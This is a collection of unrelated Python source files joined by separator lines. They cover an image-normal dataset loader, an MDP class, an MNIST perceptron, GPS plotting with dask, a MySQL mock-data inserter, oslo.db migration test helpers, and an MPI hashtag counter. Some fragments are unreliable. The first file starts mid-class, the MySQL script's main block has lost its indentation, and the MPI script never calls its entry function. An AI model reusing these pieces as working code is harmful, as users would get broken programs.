            transforms.ToPILImage(),
            transforms.Resize(self.output_size, Image.NEAREST),
            transforms.ToTensor()])
    def __getitem__(self, index):
        """Load sample *index*, paste normals into place, square-crop, transform."""
        path = self.imgs[index]
        rgb, gt, mask = rgb_normal_mask_loader(path)
        # Grayscale image: replicate to 3 channels.
        if len(rgb.shape) < 3:
            print("://")
            rgb = np.expand_dims(rgb, axis=2)
            rgb = np.repeat(rgb, 3, axis=2)
        gt_normal = gt['normal']
        # Flip z and map [-1, 1] -> [0, 255] for image-style storage.
        gt_normal[:,:,2] *= -1
        gt_normal = np.uint8((gt_normal + 1) * 0.5 * 255.0)
        # Paste the annotated normal patch into a full-size zero canvas.
        normal = np.zeros_like(rgb)
        normal[gt['min_y']:gt['max_y']+1, gt['min_x']:gt['max_x']+1] = gt_normal
        center_x = (gt['min_x'] + gt['max_x']) // 2
        center_y = (gt['min_y'] + gt['max_y']) // 2
        h, w = rgb.shape[0], rgb.shape[1]
        # Square-crop toward whichever side contains the annotation center.
        if h < w:
            if center_x > w // 2:
                cropped_rgb = rgb[0:h, w-h:w]
                cropped_mask = mask[0:h, w-h:w]
                cropped_normal = normal[0:h, w-h:w]
            else:
                cropped_rgb = rgb[0:h, 0:h]
                cropped_mask = mask[0:h, 0:h]
                cropped_normal = normal[0:h, 0:h]
        else:
            if center_y > h // 2:
                cropped_rgb = rgb[h-w:h, 0:w]
                cropped_mask = mask[h-w:h, 0:w]
                cropped_normal = normal[h-w:h, 0:w]
            else:
                cropped_rgb = rgb[0:w, 0:w]
                cropped_mask = mask[0:w, 0:w]
                cropped_normal = normal[0:w, 0:w]
        return self.transform_rgb(cropped_rgb), self.transform_normal(cropped_normal), self.transform_normal(cropped_mask)
    def __len__(self):
        """Number of samples listed in the CSV."""
        return len(self.imgs)
|
from markovdp.q_state import QState
class QStateDT(QState):
    """Class to represent a q-state in a Decision Tree MDP model."""

    def remove_state(self, state_num):
        """Removes the transition and reward information for that Q-state.

        Args:
            state_num (int): The unique state number in the MDP model
        """
        # Visits that led to state_num no longer count as times taken.
        self._action_taken_times -= self._transitions[state_num]
        self._transitions[state_num] = 0
        self._rewards[state_num] = 0

    def extend_states(self, num_states):
        """Adds extra states to the reward and transition info.

        Args:
            num_states (int): The number of the extra states to add.
        """
        self._total_states += num_states
        zeros = [0] * num_states
        self._transitions += zeros
        self._rewards += zeros
|
'''
A Multilayer Perceptron implementation example using TensorFlow library.
This example is using the MNIST database of handwritten digits (http://yann.lecun.com/exdb/mnist/)
Author: Aymeric Damien
Project: https://github.com/aymericdamien/TensorFlow-Examples/
'''
# Import MINST data
import input_data
mnist = input_data.read_data_sets("/home/ubuntu/workspace/tmp5/data/", one_hot=True)
import tensorflow as tf
# Parameters
learning_rate = 0.001
training_epochs = 15
batch_size = 100
display_step = 1  # print the loss every `display_step` epochs
# Network Parameters
n_hidden_1 = 256 # 1st layer num features
n_hidden_2 = 256 # 2nd layer num features
n_input = 784 # MNIST data input (img shape: 28*28)
n_classes = 10 # MNIST total classes (0-9 digits)
# tf Graph input
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
# Create model
def multilayer_perceptron(_X, _weights, _biases):
    """Two-hidden-layer ReLU MLP; returns unscaled class logits."""
    hidden1 = tf.nn.relu(tf.add(tf.matmul(_X, _weights['h1']), _biases['b1']))
    hidden2 = tf.nn.relu(tf.add(tf.matmul(hidden1, _weights['h2']), _biases['b2']))
    return tf.add(tf.matmul(hidden2, _weights['out']), _biases['out'])
# Store layers weight & bias
# NOTE(review): this file targets Python 2 and pre-1.0 TensorFlow (print
# statements, positional softmax_cross_entropy_with_logits args,
# initialize_all_variables) — confirm before running on modern stacks.
weights = {
    'h1': tf.Variable(tf.random_normal([n_input, n_hidden_1])),
    'h2': tf.Variable(tf.random_normal([n_hidden_1, n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_hidden_2, n_classes]))
}
biases = {
    'b1': tf.Variable(tf.random_normal([n_hidden_1])),
    'b2': tf.Variable(tf.random_normal([n_hidden_2])),
    'out': tf.Variable(tf.random_normal([n_classes]))
}
# Construct model
pred = multilayer_perceptron(x, weights, biases)
# Define loss and optimizer
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(pred, y)) # Softmax loss
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(cost) # Adam Optimizer
# Initializing the variables
init = tf.initialize_all_variables()
# Launch the graph
with tf.Session() as sess:
    sess.run(init)
    # Training cycle
    for epoch in range(training_epochs):
        avg_cost = 0.
        total_batch = int(mnist.train.num_examples/batch_size)
        # Loop over all batches
        for i in range(total_batch):
            batch_xs, batch_ys = mnist.train.next_batch(batch_size)
            # Fit training using batch data
            sess.run(optimizer, feed_dict={x: batch_xs, y: batch_ys})
            # Compute average loss
            avg_cost += sess.run(cost, feed_dict={x: batch_xs, y: batch_ys})/total_batch
        # Display logs per epoch step
        if epoch % display_step == 0:
            print "Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(avg_cost)
    print "Optimization Finished!"
    # Test model
    correct_prediction = tf.equal(tf.argmax(pred, 1), tf.argmax(y, 1))
    # Calculate accuracy
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, "float"))
    print "Accuracy:", accuracy.eval({x: mnist.test.images, y: mnist.test.labels})
|
from thumt.optimizers.optimizers import exclude_variables
from thumt.optimizers.optimizers import AdamOptimizer
from thumt.optimizers.optimizers import AdadeltaOptimizer
from thumt.optimizers.optimizers import SGDOptimizer
from thumt.optimizers.optimizers import MultiStepOptimizer
from thumt.optimizers.optimizers import LossScalingOptimizer
from thumt.optimizers.schedules import LinearWarmupRsqrtDecay
from thumt.optimizers.schedules import PiecewiseConstantDecay
from thumt.optimizers.schedules import LinearExponentialDecay
from thumt.optimizers.clipping import (
adaptive_clipper, global_norm_clipper, value_clipper)
|
import datetime
import pandas as pd
import numpy as np
from dask import dataframe as dd
import matplotlib.pyplot as plt
from pandas.plotting import register_matplotlib_converters
register_matplotlib_converters()
#load in the dask dataframe
df = dd.read_parquet("/Users/amyferrick/Downloads/5_min_gps_subset/unr_5min_gps" + ".parquet")
def query_data(df, site_ID, start_time, end_time):
    """Return (time, e, n, v) arrays for one site over [start_time, end_time).

    *site_ID*, *start_time* and *end_time* are strings spliced verbatim
    into dask ``query`` expressions, so site_ID must carry its own quotes
    and the times must be valid datetime expressions.
    """
    in_interval = (
        df.query('site == ' + site_ID)
          .query(start_time + ' <= date_time < ' + end_time)
    )
    return (
        in_interval.date_time.compute().values,
        in_interval.e_ref.compute().values,
        in_interval.n_ref.compute().values,
        in_interval.v_ref.compute().values,
    )
site_ID = '"LHAW"' # fill in site ID here (the double quotation is necessary)
siteID = 'LHAW' # with single quotes, need this for plotting later
start_time = 'datetime.datetime(2013, 2, 28, 12)'# fill in start of time interval
end_time = 'datetime.datetime(2013, 3, 3, 12)' # fill in end of time interval
time, e, n, v = query_data(df, site_ID, start_time, end_time)
# plot the three panel time series (east / north / up, top to bottom)
plt.figure(figsize=(20,10))
plt.suptitle("Site: "+site_ID, weight='bold')
plt.subplot(3, 1, 1)
plt.plot(time, e, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("east position (units)", weight = 'bold')
plt.subplot(3, 1, 2)
plt.plot(time, n, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("north position (units)", weight='bold')
plt.subplot(3, 1, 3)
plt.plot(time, v, "r.", ms=1)
plt.xlabel("time", weight='bold')
plt.ylabel("up position (units)", weight='bold')
# save before show: show() clears the current figure on some backends
plt.savefig("/Users/amyferrick/Downloads/5_min_gps_subset/" + siteID + ".png")
plt.show()
|
from sqlalchemy import *
from databases import Database
import aiomysql
import sqlalchemy
from sqlalchemy.engine import reflection
import pytest
import functools
import asyncio
from devtools import debug
from unimeta.table import Table
from loguru import logger
import configparser
from unimeta.libs.liburl import parse_url
import pymysql
import time
import random
# Read connection settings (the [mysql] url) from the local .env file.
config = configparser.ConfigParser()
config.read(".env")
async def fake() -> None:
    """Endlessly insert and update mock rows in every table of the schema.

    Reflects table metadata from the configured MySQL URL, then loops
    forever: pick a random table, mock-insert a row (using the faker
    hints below), then mock-update it.

    NOTE: this loop never terminates on its own — stop with Ctrl-C.
    """
    database_url = config['mysql'].get("url")
    meta = Table.metadata(database_url)
    debug(meta)
    # Column-name -> faker provider hints used for mock value generation.
    hint = {
        "email":"ascii_free_email",
        "phone_number":"phone_number",
        "first_name":"first_name",
        "last_name":"last_name"
    }
    async with Database(database_url) as database:
        while True:
            try:
                keys = list(meta.keys())
                key = random.choice(keys)
                debug(key)
                table = meta[key]
                primary_id = await table.mock_insert(database, hint)
                await table.mock_update(database, hint, primary_id)
            except pymysql.err.DataError:
                # Generated value didn't fit the column: log and keep going.
                logger.exception("what")
if __name__ == "__main__":
loop = asyncio.get_event_loop()
res = loop.run_until_complete(fake())
loop.close() |
# Copyright 2010-2011 OpenStack Foundation
# Copyright 2012-2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import abc
import collections
import functools
import logging
import pprint
import alembic
import alembic.autogenerate
import alembic.migration
import pkg_resources as pkg
import six
import sqlalchemy
import sqlalchemy.exc
import sqlalchemy.sql.expression as expr
import sqlalchemy.types as types
from oslo_db._i18n import _LE
from oslo_db import exception as exc
from oslo_db.sqlalchemy import utils
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
class WalkVersionsMixin(object):
    """Test mixin to check upgrade and downgrade ability of migration.
    This is only suitable for testing of migrate_ migration scripts. An
    abstract class mixin. `INIT_VERSION`, `REPOSITORY` and `migration_api`
    attributes must be implemented in subclasses.
    .. _auxiliary-dynamic-methods: Auxiliary Methods
    Auxiliary Methods:
    `migrate_up` and `migrate_down` instance methods of the class can be
    used with auxiliary methods named `_pre_upgrade_<revision_id>`,
    `_check_<revision_id>`, `_post_downgrade_<revision_id>`. The methods
    intended to check applied changes for correctness of data operations.
    This methods should be implemented for every particular revision
    which you want to check with data. Implementation recommendations for
    `_pre_upgrade_<revision_id>`, `_check_<revision_id>`,
    `_post_downgrade_<revision_id>` implementation:
        * `_pre_upgrade_<revision_id>`: provide a data appropriate to
            a next revision. Should be used an id of revision which
            going to be applied.
        * `_check_<revision_id>`: Insert, select, delete operations
            with newly applied changes. The data provided by
            `_pre_upgrade_<revision_id>` will be used.
        * `_post_downgrade_<revision_id>`: check for absence
            (inability to use) changes provided by reverted revision.
    Execution order of auxiliary methods when revision is upgrading:
        `_pre_upgrade_###` => `upgrade` => `_check_###`
    Execution order of auxiliary methods when revision is downgrading:
        `downgrade` => `_post_downgrade_###`
    .. _migrate: https://sqlalchemy-migrate.readthedocs.org/en/latest/
    """
    # NOTE: abc.abstractproperty is deprecated on Python 3 in favour of
    # @property + @abc.abstractmethod; kept here for py2/six compatibility.
    @abc.abstractproperty
    def INIT_VERSION(self):
        """Initial version of a migration repository.
        Can be different from 0, if a migrations were squashed.
        :rtype: int
        """
        pass
    @abc.abstractproperty
    def REPOSITORY(self):
        """Allows basic manipulation with migration repository.
        :returns: `migrate.versioning.repository.Repository` subclass.
        """
        pass
    @abc.abstractproperty
    def migration_api(self):
        """Provides API for upgrading, downgrading and version manipulations.
        :returns: `migrate.api` or overloaded analog.
        """
        pass
    @abc.abstractproperty
    def migrate_engine(self):
        """Provides engine instance.
        Should be the same instance as used when migrations are applied. In
        most cases, the `engine` attribute provided by the test class in a
        `setUp` method will work.
        Example of implementation:
            def migrate_engine(self):
                return self.engine
        :returns: sqlalchemy engine instance
        """
        pass
    # Thin deprecated aliases kept for callers of the old underscore names.
    def _walk_versions(self, snake_walk=False, downgrade=True):
        """Check if migration upgrades and downgrades successfully.
        DEPRECATED: this function is deprecated and will be removed from
        oslo.db in a few releases. Please use walk_versions() method instead.
        """
        self.walk_versions(snake_walk, downgrade)
    def _migrate_down(self, version, with_data=False):
        """Migrate down to a previous version of the db.
        DEPRECATED: this function is deprecated and will be removed from
        oslo.db in a few releases. Please use migrate_down() method instead.
        """
        return self.migrate_down(version, with_data)
    def _migrate_up(self, version, with_data=False):
        """Migrate up to a new version of the db.
        DEPRECATED: this function is deprecated and will be removed from
        oslo.db in a few releases. Please use migrate_up() method instead.
        """
        self.migrate_up(version, with_data)
    def walk_versions(self, snake_walk=False, downgrade=True):
        """Check if migration upgrades and downgrades successfully.
        Determine the latest version script from the repo, then
        upgrade from 1 through to the latest, with no data
        in the databases. This just checks that the schema itself
        upgrades successfully.
        `walk_versions` calls `migrate_up` and `migrate_down` with
        `with_data` argument to check changes with data, but these methods
        can be called without any extra check outside of `walk_versions`
        method.
        :param snake_walk: enables checking that each individual migration can
            be upgraded/downgraded by itself.
            If we have ordered migrations 123abc, 456def, 789ghi and we run
            upgrading with the `snake_walk` argument set to `True`, the
            migrations will be applied in the following order:
                `123abc => 456def => 123abc =>
                 456def => 789ghi => 456def => 789ghi`
        :type snake_walk: bool
        :param downgrade: Check downgrade behavior if True.
        :type downgrade: bool
        """
        # Place the database under version control
        self.migration_api.version_control(self.migrate_engine,
                                           self.REPOSITORY,
                                           self.INIT_VERSION)
        self.assertEqual(self.INIT_VERSION,
                         self.migration_api.db_version(self.migrate_engine,
                                                       self.REPOSITORY))
        LOG.debug('latest version is %s', self.REPOSITORY.latest)
        versions = range(int(self.INIT_VERSION) + 1,
                         int(self.REPOSITORY.latest) + 1)
        for version in versions:
            # upgrade -> downgrade -> upgrade
            self.migrate_up(version, with_data=True)
            if snake_walk:
                downgraded = self.migrate_down(version - 1, with_data=True)
                if downgraded:
                    self.migrate_up(version)
        if downgrade:
            # Now walk it back down to 0 from the latest, testing
            # the downgrade paths.
            for version in reversed(versions):
                # downgrade -> upgrade -> downgrade
                downgraded = self.migrate_down(version - 1)
                if snake_walk and downgraded:
                    self.migrate_up(version)
                    self.migrate_down(version - 1)
    def migrate_down(self, version, with_data=False):
        """Migrate down to a previous version of the db.
        :param version: id of revision to downgrade.
        :type version: str
        :keyword with_data: Whether to verify the absence of changes from
            migration(s) being downgraded, see
            :ref:`auxiliary-dynamic-methods <Auxiliary Methods>`.
        :type with_data: Bool
        """
        try:
            self.migration_api.downgrade(self.migrate_engine,
                                         self.REPOSITORY, version)
        except NotImplementedError:
            # NOTE(sirp): some migrations, namely release-level
            # migrations, don't support a downgrade.
            return False
        self.assertEqual(version, self.migration_api.db_version(
            self.migrate_engine, self.REPOSITORY))
        # NOTE(sirp): `version` is what we're downgrading to (i.e. the 'target'
        # version). So if we have any downgrade checks, they need to be run for
        # the previous (higher numbered) migration.
        if with_data:
            post_downgrade = getattr(
                self, "_post_downgrade_%03d" % (version + 1), None)
            if post_downgrade:
                post_downgrade(self.migrate_engine)
        return True
    def migrate_up(self, version, with_data=False):
        """Migrate up to a new version of the db.
        :param version: id of revision to upgrade.
        :type version: str
        :keyword with_data: Whether to verify the applied changes with data,
            see :ref:`auxiliary-dynamic-methods <Auxiliary Methods>`.
        :type with_data: Bool
        """
        # NOTE(sdague): try block is here because it's impossible to debug
        # where a failed data migration happens otherwise
        try:
            if with_data:
                data = None
                pre_upgrade = getattr(
                    self, "_pre_upgrade_%03d" % version, None)
                if pre_upgrade:
                    data = pre_upgrade(self.migrate_engine)
            self.migration_api.upgrade(self.migrate_engine,
                                       self.REPOSITORY, version)
            self.assertEqual(version,
                             self.migration_api.db_version(self.migrate_engine,
                                                           self.REPOSITORY))
            if with_data:
                check = getattr(self, "_check_%03d" % version, None)
                if check:
                    check(self.migrate_engine, data)
        except exc.DbMigrationError:
            msg = _LE("Failed to migrate to version %(ver)s on engine %(eng)s")
            LOG.error(msg, {"ver": version, "eng": self.migrate_engine})
            raise
@six.add_metaclass(abc.ABCMeta)
class ModelsMigrationsSync(object):
    """A helper class for comparison of DB migration scripts and models.
    It's intended to be inherited by test cases in target projects. They have
    to provide implementations for methods used internally in the test (as
    we have no way to implement them here).
    test_model_sync() will run migration scripts for the engine provided and
    then compare the given metadata to the one reflected from the database.
    The difference between MODELS and MIGRATION scripts will be printed and
    the test will fail, if the difference is not empty. The return value is
    really a list of actions, that should be performed in order to make the
    current database schema state (i.e. migration scripts) consistent with
    models definitions. It's left up to developers to analyze the output and
    decide whether the models definitions or the migration scripts should be
    modified to make them consistent.
    Output::
        [(
            'add_table',
            description of the table from models
        ),
        (
            'remove_table',
            description of the table from database
        ),
        (
            'add_column',
            schema,
            table name,
            column description from models
        ),
        (
            'remove_column',
            schema,
            table name,
            column description from database
        ),
        (
            'add_index',
            description of the index from models
        ),
        (
            'remove_index',
            description of the index from database
        ),
        (
            'add_constraint',
            description of constraint from models
        ),
        (
            'remove_constraint',
            description of constraint from database
        ),
        (
            'modify_nullable',
            schema,
            table name,
            column name,
            {
                'existing_type': type of the column from database,
                'existing_server_default': default value from database
            },
            nullable from database,
            nullable from models
        ),
        (
            'modify_type',
            schema,
            table name,
            column name,
            {
                'existing_nullable': database nullable,
                'existing_server_default': default value from database
            },
            database column type,
            type of the column from models
        ),
        (
            'modify_default',
            schema,
            table name,
            column name,
            {
                'existing_nullable': database nullable,
                'existing_type': type of the column from database
            },
            connection column default value,
            default from models
        )]
    Method include_object() can be overridden to exclude some tables from
    comparison (e.g. migrate_repo).
    """
    @abc.abstractmethod
    def db_sync(self, engine):
        """Run migration scripts with the given engine instance.
        This method must be implemented in subclasses and run migration scripts
        for a DB the given engine is connected to.
        """
    @abc.abstractmethod
    def get_engine(self):
        """Return the engine instance to be used when running tests.
        This method must be implemented in subclasses and return an engine
        instance to be used when running tests.
        """
    @abc.abstractmethod
    def get_metadata(self):
        """Return the metadata instance to be used for schema comparison.
        This method must be implemented in subclasses and return the metadata
        instance attached to the BASE model.
        """
    def include_object(self, object_, name, type_, reflected, compare_to):
        """Return True for objects that should be compared.
        :param object_: a SchemaItem object such as a Table or Column object
        :param name: the name of the object
        :param type_: a string describing the type of object (e.g. "table")
        :param reflected: True if the given object was produced based on
                          table reflection, False if it's from a local
                          MetaData object
        :param compare_to: the object being compared against, if available,
                           else None
        """
        return True
    def compare_type(self, ctxt, insp_col, meta_col, insp_type, meta_type):
        """Return True if types are different, False if not.
        Return None to allow the default implementation to compare these types.
        :param ctxt: alembic MigrationContext instance
        :param insp_col: reflected column
        :param meta_col: column from model
        :param insp_type: reflected column type
        :param meta_type: column type from model
        """
        # some backends (e.g. mysql) don't provide native boolean type
        BOOLEAN_METADATA = (types.BOOLEAN, types.Boolean)
        BOOLEAN_SQL = BOOLEAN_METADATA + (types.INTEGER, types.Integer)
        if issubclass(type(meta_type), BOOLEAN_METADATA):
            return not issubclass(type(insp_type), BOOLEAN_SQL)
        return None  # tells alembic to use the default comparison method
    def compare_server_default(self, ctxt, ins_col, meta_col,
                               insp_def, meta_def, rendered_meta_def):
        """Compare default values between model and db table.
        Return True if the defaults are different, False if not, or None to
        allow the default implementation to compare these defaults.
        :param ctxt: alembic MigrationContext instance
        :param insp_col: reflected column
        :param meta_col: column from model
        :param insp_def: reflected column default value
        :param meta_def: column default value from model
        :param rendered_meta_def: rendered column default value (from model)
        """
        return self._compare_server_default(ctxt.bind, meta_col, insp_def,
                                            meta_def)
    # Dialect-dispatched helper: the "*" registration is the fallback that
    # returns None, which tells alembic to use its default comparison.
    @utils.DialectFunctionDispatcher.dispatch_for_dialect("*")
    def _compare_server_default(bind, meta_col, insp_def, meta_def):
        pass
    @_compare_server_default.dispatch_for('mysql')
    def _compare_server_default(bind, meta_col, insp_def, meta_def):
        if isinstance(meta_col.type, sqlalchemy.Boolean):
            if meta_def is None or insp_def is None:
                return meta_def != insp_def
            # MySQL reflects boolean defaults as the strings '1'/'0'.
            return not (
                isinstance(meta_def.arg, expr.True_) and insp_def == "'1'" or
                isinstance(meta_def.arg, expr.False_) and insp_def == "'0'"
            )
        if isinstance(meta_col.type, sqlalchemy.Integer):
            if meta_def is None or insp_def is None:
                return meta_def != insp_def
            return meta_def.arg != insp_def.split("'")[1]
    @_compare_server_default.dispatch_for('postgresql')
    def _compare_server_default(bind, meta_col, insp_def, meta_def):
        if isinstance(meta_col.type, sqlalchemy.Enum):
            if meta_def is None or insp_def is None:
                return meta_def != insp_def
            return insp_def != "'%s'::%s" % (meta_def.arg, meta_col.type.name)
        elif isinstance(meta_col.type, sqlalchemy.String):
            if meta_def is None or insp_def is None:
                return meta_def != insp_def
            return insp_def != "'%s'::character varying" % meta_def.arg
    FKInfo = collections.namedtuple('fk_info', ['constrained_columns',
                                                'referred_table',
                                                'referred_columns'])
    def check_foreign_keys(self, metadata, bind):
        """Compare foreign keys between model and db table.
        :returns: a list that contains information about:
            * should be a new key added or removed existing,
            * name of that key,
            * source table,
            * referred table,
            * constrained columns,
            * referred columns
        Output::
            [('drop_key',
              'testtbl_fk_check_fkey',
              'testtbl',
              fk_info(constrained_columns=(u'fk_check',),
                      referred_table=u'table',
                      referred_columns=(u'fk_check',)))]
        DEPRECATED: this function is deprecated and will be removed from
        oslo.db in a few releases. Alembic autogenerate.compare_metadata()
        now includes foreign key comparison directly.
        """
        diff = []
        insp = sqlalchemy.engine.reflection.Inspector.from_engine(bind)
        # Get all tables from db
        db_tables = insp.get_table_names()
        # Get all tables from models
        model_tables = metadata.tables
        for table in db_tables:
            if table not in model_tables:
                continue
            # Get all necessary information about key of current table from db
            fk_db = dict((self._get_fk_info_from_db(i), i['name'])
                         for i in insp.get_foreign_keys(table))
            fk_db_set = set(fk_db.keys())
            # Get all necessary information about key of current table from
            # models
            fk_models = dict((self._get_fk_info_from_model(fk), fk)
                             for fk in model_tables[table].foreign_keys)
            fk_models_set = set(fk_models.keys())
            # Set difference in both directions yields dropped vs. added keys.
            for key in (fk_db_set - fk_models_set):
                diff.append(('drop_key', fk_db[key], table, key))
                LOG.info(("Detected removed foreign key %(fk)r on "
                          "table %(table)r"), {'fk': fk_db[key],
                                               'table': table})
            for key in (fk_models_set - fk_db_set):
                diff.append(('add_key', fk_models[key], table, key))
                LOG.info((
                    "Detected added foreign key for column %(fk)r on table "
                    "%(table)r"), {'fk': fk_models[key].column.name,
                                   'table': table})
        return diff
    def _get_fk_info_from_db(self, fk):
        return self.FKInfo(tuple(fk['constrained_columns']),
                           fk['referred_table'],
                           tuple(fk['referred_columns']))
    def _get_fk_info_from_model(self, fk):
        return self.FKInfo((fk.parent.name,), fk.column.table.name,
                           (fk.column.name,))
    def filter_metadata_diff(self, diff):
        """Filter changes before assert in test_models_sync().
        Allow subclasses to whitelist/blacklist changes. By default, no
        filtering is performed, changes are returned as is.
        :param diff: a list of differences (see `compare_metadata()` docs for
                     details on format)
        :returns: a list of differences
        """
        return diff
    def test_models_sync(self):
        # recent versions of sqlalchemy and alembic are needed for running of
        # this test, but we already have them in requirements
        try:
            pkg.require('sqlalchemy>=0.8.4', 'alembic>=0.6.2')
        except (pkg.VersionConflict, pkg.DistributionNotFound) as e:
            # Message now matches the version actually required above
            # (was "alembic>=0.6.3", contradicting the pkg.require call).
            self.skipTest('sqlalchemy>=0.8.4 and alembic>=0.6.2 are required'
                          ' for running of this test: %s' % e)
        # drop all tables after a test run
        self.addCleanup(functools.partial(self.db.backend.drop_all_objects,
                                          self.get_engine()))
        # run migration scripts
        self.db_sync(self.get_engine())
        with self.get_engine().connect() as conn:
            opts = {
                'include_object': self.include_object,
                'compare_type': self.compare_type,
                'compare_server_default': self.compare_server_default,
            }
            mc = alembic.migration.MigrationContext.configure(conn, opts=opts)
            # compare schemas and fail with diff, if it's not empty
            diff = self.filter_metadata_diff(
                alembic.autogenerate.compare_metadata(mc, self.get_metadata()))
            if diff:
                msg = pprint.pformat(diff, indent=2, width=20)
                self.fail(
                    "Models and migration scripts aren't in sync:\n%s" % msg)
|
from synchp.settings import Settings
def test_parse_config_file():
    """Smoke test: the bundled synch.yaml must load without raising."""
    Settings.init("synch.yaml")
def test_settings():
    """Every typed accessor must return a value of its documented type."""
    checks = [
        (Settings.debug(), bool),
        (Settings.insert_num(), int),
        (Settings.insert_interval(), int),
    ]
    for value, expected_type in checks:
        assert isinstance(value, expected_type)
|
from mpi4py import MPI
import json
import re
from collections import Counter as c
from collections import Counter, defaultdict
from collections import OrderedDict
import time
import sys
# MPI identity: every rank runs this whole script over the same input file;
# lines are divided between ranks inside twitterProcessor().
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
size = comm.Get_size()
# Per-grid-id state, filled by loadGrid(): cell geometry, tweet counts,
# and per-hashtag counts (each with a running "total").
grids = {}
gridCounter = {}
hashtagCounter = {}
start_time = time.time()
# Parse the grid info from the melbGrid.json
def loadGrid():
    """Load melbGrid.json, initialise the per-grid counters, then run.

    Side effects: populates the module-level grids/gridCounter/
    hashtagCounter dicts and calls twitterProcessor() at the end, so this
    function is effectively the program's entry point.
    """
    with open("melbGrid.json") as f:
        info = json.load(f)
    # intialize the data structure that used for counting
    for i in info["features"]:
        grid = i["properties"]['id']
        grids[grid] = i["properties"]
        gridCounter[grid] = 0
        hashtagCounter[grid] = {}
        # "total" tracks all hashtag occurrences in the cell, alongside
        # the individual tag counts stored in the same dict.
        hashtagCounter[grid]["total"] = 0
    # start processing
    twitterProcessor()
# Parse the file line by line, avoid parse the whole file directly
def twitterProcessor():
    """Stream the tweet file, counting tweets and hashtags per grid cell.

    Lines are shared round-robin across MPI ranks: rank r handles lines
    r, r+size, r+2*size, ...  Partial counts are merged in collectResult().
    """
    lineNum = 0
    assignedLine = rank
    print(sys.argv[0])
    with open(sys.argv[1]) as f:
        for line in f:
            if assignedLine == lineNum:
                assignedLine = assignedLine + size
                # Parse once and reuse; lines without a Point geometry
                # (e.g. the file's wrapper lines) yield None and are skipped.
                coords = parseCoordinates(line)
                if coords is not None:
                    x, y = coords
                    grid = checkWhichGrid(x, y)
                    # count how many twitter in each grid
                    countPerGrid(grid)
                    # parse string that contains the hash tag
                    parsedJSON = parseHashTag(line)
                    # count hash tag in the each grid
                    countHashTagPerGrid(parsedJSON, grid)
            lineNum += 1
    collectResult()
# collect result from the other processes into master process
def collectResult():
    """Gather per-rank counters onto rank 0 and print the final rankings."""
    c1 = c()
    c2 = defaultdict(c)
    sortedKey = []
    # Every rank participates in the collective gather; only rank 0
    # receives the combined lists and prints.
    gridResult = comm.gather(gridCounter, root=0)
    hashtagResult = comm.gather(hashtagCounter, root=0)
    if rank == 0:
        for r in gridResult:
            c1 = c1 + c(r)
        for item in hashtagResult:
            for k,d in item.items():
                c2[k].update(d)
                c2[k].most_common()
        print("##########Rank of grids##########")
        for k,v in c1.most_common():
            print(k, v)
        print("##########Rank of hash tags##########")
        # print rank of tags
        # Grids ordered by their "total" hashtag count, descending.
        sortedc2 = OrderedDict(sorted(c2.items(), key=lambda x: x[1]['total'], reverse=True))
        for k in sortedc2:
            # The [1:...] slice relies on "total" ranking first in
            # most_common() — true since total >= any single tag count.
            if (len(sortedc2[k]) > 5):
                print(k, list(sortedc2[k].most_common())[1:6])
            else:
                # NOTE(review): [1:len-1] drops the lowest-ranked tag as
                # well as "total" — looks like an off-by-one; confirm
                # against the spec before changing.
                print(k, list(sortedc2[k].most_common())[1:len(sortedc2[k])-1])
        total = time.time() - start_time
        minutes, seconds = divmod(total, 60)
        print("time takes: %02d minutes and %02d seconds"%(minutes, seconds))
def parseCoordinates(line):
    """Extract (x, y) from a tweet's Point geometry, or None if absent."""
    found = re.search(r'\"type\":\"Point\",\"coordinates\":\[(.*?)\]', line)
    if not found:
        return None
    # Wrap the matched fragment in braces so it parses as a JSON object.
    point = json.loads('{' + found.group() + '}')
    coords = point["coordinates"]
    return coords[0], coords[1]
def countPerGrid(c):
    """Increment the tweet count for grid id *c*; unknown/None ids are ignored."""
    # Membership test on the dict itself — no need to materialise .keys().
    # (The parameter name shadows the module's `Counter as c` alias only
    # inside this function body.)
    if c in gridCounter:
        gridCounter[c] += 1
def checkWhichGrid(x, y):
    """Return the id of the grid cell containing point (x, y), else None."""
    for c in gridCounter:
        cell = grids[c]
        # Chained comparisons; all four edges are inclusive, so a point on
        # a shared boundary is credited to the first matching cell.
        if cell['xmin'] <= x <= cell['xmax'] and cell['ymin'] <= y <= cell['ymax']:
            return c
    return None
# Parse the file line by line, avoid parse the whole file directly
def parseHashTag(line):
    """Extract the "hashtags":[...] fragment from a line as a parsed dict.

    Returns None when no complete hashtags array can be recovered.
    """
    extractedStr = ""
    # Non-greedy match stops at the first ']', which is wrong when a
    # hashtag object itself contains '[' — hence the bracket-balancing
    # fallback below via closedBracketIndex().
    match = re.search(r'\"hashtags\":\[(.*?)\]',line)
    if match is not None and not closedBracketIndex(match.group()) == match.group():
        # Re-match greedily to the end of the line, then trim to the
        # position where the '[' actually balances.
        matchRest = re.search(r'\"hashtags\":\[.*',line)
        extractedStr = closedBracketIndex(matchRest.group())
    # NOTE(review): when the first match IS already balanced, extractedStr
    # stays "" and this returns None — confirm that is intended rather
    # than returning the balanced match itself.
    if not extractedStr == "":
        parsedJSON = json.loads('{'+ extractedStr +'}')
        return parsedJSON
def countHashTagPerGrid(parsedJSON, grid):
    """Accumulate hashtag occurrences for *grid* from a parsed tweet fragment.

    Silently does nothing when either argument is None (tweet outside all
    grids, or no hashtags found on the line).
    """
    if parsedJSON is not None and grid is not None:
        counter = hashtagCounter[grid]
        for entry in parsedJSON["hashtags"]:
            tag = entry["text"]
            counter["total"] += 1
            # dict.get collapses the seen/unseen-tag branches into one line.
            counter[tag] = counter.get(tag, 0) + 1
